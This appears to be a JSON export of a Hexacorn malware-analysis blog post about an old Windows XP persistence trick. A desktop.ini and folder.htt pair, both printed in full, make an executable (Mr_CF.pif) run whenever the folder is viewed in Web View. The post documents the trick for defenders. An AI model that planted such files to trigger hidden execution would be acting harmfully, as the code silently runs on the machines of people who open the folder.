{"id":3919,"date":"2016-11-05T01:13:56","date_gmt":"2016-11-05T01:13:56","guid":{"rendered":"http:\/\/www.hexacorn.com\/blog\/?p=3919"},"modified":"2016-11-05T01:15:49","modified_gmt":"2016-11-05T01:15:49","slug":"beyond-good-ol-run-key-part-49","status":"publish","type":"post","link":"https:\/\/www.hexacorn.com\/blog\/2016\/11\/05\/beyond-good-ol-run-key-part-49\/","title":{"rendered":"Beyond good ol\u2019 Run key, Part 49"},"content":{"rendered":"

I was reviewing the logs of my sandbox and came across a very old malware that was using an old-school trick as a way to increase its chances of survival – it used the desktop.ini<\/a> \/ folder.htt<\/a> combo that comes to play when the Web View<\/a> is chosen for folders (XP or earlier). I know, I know.. it’s archaeology… but I checked my old posts in this series and realized I have not covered it yet, so I am fixing it now…<\/p>\n

An example Desktop.ini created by the malware looks like this:<\/p>\n

[.ShellClassInfo]\r\nConfirmFileOp=0\r\n[{5984FFE0-28D4-11CF-AE66-08002B2E1262}]\r\nPersistMoniker=file:\/\/Folder.htt\r\n[ExtShellFolderViews]\r\n{5984FFE0-28D4-11CF-AE66-08002B2E1262}={5984FFE0-28D4-11CF-AE66-08002B2E1262}<\/pre>\n
and the associated folder.htt like this:<\/p>\n
<html>\r\n<head>\r\n<meta http-equiv=\"content-type\"content=\"text\/html; charset=Windows-1252\">\r\n<\/head>\r\n<body style=\"margin: 0\" scroll=no>\r\n<object id=FileList border=0 tabindex=1\r\nclassid= \"clsid:1820FED0-473E-11D0-A96C-00C04FD705A2\"\r\nstyle=\"width: 100; height: 100\" tabIndex=-1>\r\n<\/object>\r\n<\/body>\r\n<\/html>\r\n<script>\r\nobjectstr=\"<OBJECT ID=\\\"RUNIT\\\" WIDTH=0 HEIGHT=0 TYPE=\\\"application\/x-oleobject\\\"\"\r\nobjectstr+=\"CODEBASE=\\\"Mr_CF.pif#version=1,1,1,1\\\">\"\r\nobjectstr+=\"<PARAM NAME=\\\"_Version\\\" VALUE=\\\"65536\\\">\"\r\nobjectstr+=\"<\/OBJECT>\"\r\nobjectstr+=\"<HTML><H1><\/H1><\/HTML>\";\r\ndocument.writeln(objectstr);\r\ndocument.close();\r\n<\/script><\/pre>\n
There is not much more I can write here… this is super old-school and I am just adding it for completeness.<\/p>\n","protected":false},"excerpt":{"rendered":"
I was reviewing the logs of my sandbox and came across a very old malware that was using an old-school trick as a way to increase its chances of survival – it used the desktop.ini \/ folder.htt combo that comes … Continue reading →<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":[],"categories":[35,15,19,46,9],"tags":[],"_links":{"self":[{"href":"https:\/\/www.hexacorn.com\/blog\/wp-json\/wp\/v2\/posts\/3919"}],"collection":[{"href":"https:\/\/www.hexacorn.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.hexacorn.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.hexacorn.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.hexacorn.com\/blog\/wp-json\/wp\/v2\/comments?post=3919"}],"version-history":[{"count":4,"href":"https:\/\/www.hexacorn.com\/blog\/wp-json\/wp\/v2\/posts\/3919\/revisions"}],"predecessor-version":[{"id":3923,"href":"https:\/\/www.hexacorn.com\/blog\/wp-json\/wp\/v2\/posts\/3919\/revisions\/3923"}],"wp:attachment":[{"href":"https:\/\/www.hexacorn.com\/blog\/wp-json\/wp\/v2\/media?parent=3919"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.hexacorn.com\/blog\/wp-json\/wp\/v2\/categories?post=3919"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.hexacorn.com\/blog\/wp-json\/wp\/v2\/tags?post=3919"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}